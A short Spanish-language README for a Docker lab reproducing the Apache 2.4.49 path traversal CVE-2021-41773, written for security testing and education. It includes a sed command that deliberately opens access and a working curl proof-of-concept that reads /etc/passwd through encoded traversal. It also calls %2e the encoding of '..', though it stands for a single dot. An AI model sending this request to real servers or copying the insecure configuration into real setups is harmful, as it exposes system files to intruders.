
Entorno de laboratorio basado en Docker para la vulnerabilidad de path traversal de Apache CVE-2021-41773 con exploit PoC y recorrido detallado para pruebas de seguridad y educación.
-> Imagen base: httpd:2.4.49 (versión que contiene la vulnerabilidad)
-> 'sed -i 's/Require all denied/Require all granted/g' : permite Path Traversal y acceso externo
-> Definición de Apache
-> Mapeo del puerto 8080 al puerto 80 del contenedor
Ejecución de docker
Ejecución del PoC
-> curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
-> /etc/passwd contiene información sensible; %2e es la palabra codificada de .., que es un comando para moverse al directorio padre
-> Al manipular la ruta, se consigue que el servidor acceda a /etc/passwd y lo muestre
-> Como se muestra en la imagen anterior, es posible acceder a directorios sensibles
https://github.com/JIYUN02/cve-2021-41773
-> Existe historial de commits